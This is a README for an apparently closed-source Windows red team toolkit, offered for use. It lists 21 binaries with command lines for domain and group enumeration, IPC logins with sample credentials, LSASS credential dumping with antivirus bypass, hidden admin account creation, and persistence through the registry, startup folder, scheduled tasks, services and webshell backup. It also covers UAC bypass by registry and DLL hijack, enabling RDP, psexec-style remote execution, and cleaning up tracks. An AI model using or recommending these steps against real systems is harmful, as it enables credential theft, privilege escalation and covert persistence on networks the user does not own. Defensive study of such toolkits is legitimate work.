RedTeamTools

Tools developed during the personal learning process，if you find some problem I hope you can give me a issue let me know how to become better，thanks

Tools are not open source, use them and cherish them

Notes:
Some tools introduce you can go to my blog, you can get more design details

Blog address:
https://yangsirrr.github.io/

01Get Target User

new1.exe \\192.168.3.144

02Get Target Local Administrators Group

new2.exe administrators \\192.168.3.144

03Get Target All Local Group

new3.exe \\192.168.3.144

04Get Target Goup Member

new4.exe "domain admins" \\192.168.3.144

05Make The IPC Connect

new5.exe \\192.168.3.144 rootkit.org\sqladmin Admin12345

06Delete The IPC Connect

new6.exe \\192.168.3.144

07Get The Internet Session To Help Find The Domain Manager

new7.exe \\192.168.3.144

08Get Login User To Help Find The Domain Manager

new8.exe \\192.168.3.144

09Dump Lsass BypassAV

new9-1.exe

10Fast Information Collection

You can use in the workgroup OR domain computer
new10_domain.exe > 1.txt
new10_workgroup.exe > 2.txt

11Add Admin User BypassAV

new11.exe user pass
11.vbs #direct to use
easy11_direct.exe #direct to use   admininfo:support_win2019$/NoBase64==
easy11.dll  #rundll32 easy11.dll admin  admininfo:DefaultAccount$/NoBase64==

12Write The Registry

12.exe

13Write The Start Dir

13.exe
Make sure your tar exe in the C:\Windows\Temp\Updating.exe

14Taskplan To Exec Your EXE

14.exe c:\123\321.exe A
Very to use，like to this

15Taskplan To Backup Your WEBSHELL

15x32.exe C:\phpstudyWWW\shell.php A
Very to use，like to this

16Use The Registry To Bypassuac(BypassAV)

Now this program have six plans to bypassuac in win10 maybe can use in win7(I don't have win7 machine to test)
you can easy to use, such as 16x64.exe 1or2or3or4or5or6 cmd.exe
16x64.exe 5 cmd.exe

17Use DLL Hijack To Bypassuac

After a simple test, two methods win10, Win11 can be successfully used
make sure upload the exe&jpg to your target windows, you can easy to use:
pic1_a.exe or pic2_a.exe

when you success, don't forget to clean up the tracks:
picall_clean.exe

bypass result

18Fast Open Rdpport(BypassAV)

Easy to open the rdpport win10 can be success

bypass360

19PsexecLiker

19.exe 192.168.159.143 administrator Aa123456 C:\Users\Administrator\Desktop\1.exe test

20Windows Service Auto Start(BypassAV)

20.exe servicename filepath

21LdapQuery

Usage: 21x32.exe target username password  basedn filterwayORyourfilter
Eg:    21x32.exe 192.168.3.144 sqladmin Admin12345   DC=rootkit,DC=org  B
Eg:    21x32.exe 192.168.3.144 sqladmin Admin12345   DC=rootkit,DC=org  (objectClass=person)
A:search user
B:search computer
C:search unconstrained delegation computer
D:search delegation computer

More introduce you can go to:
https://yangsirrr.github.io/2021/11/16/shi-xian-ldap-xin-xi-shou-ji/

YangSirrr/YangsirRedTeamTools

RedTeamTools

Tools developed during the personal learning process，if you find some problem I hope you can give me a issue let me know how to become better，thanks

Tools are not open source, use them and cherish them

01Get Target User

02Get Target Local Administrators Group

03Get Target All Local Group

04Get Target Goup Member

05Make The IPC Connect

06Delete The IPC Connect

07Get The Internet Session To Help Find The Domain Manager

08Get Login User To Help Find The Domain Manager

09Dump Lsass BypassAV

10Fast Information Collection

11Add Admin User BypassAV

12Write The Registry

13Write The Start Dir

14Taskplan To Exec Your EXE

15Taskplan To Backup Your WEBSHELL

16Use The Registry To Bypassuac(BypassAV)

17Use DLL Hijack To Bypassuac

18Fast Open Rdpport(BypassAV)

19PsexecLiker

20Windows Service Auto Start(BypassAV)

21LdapQuery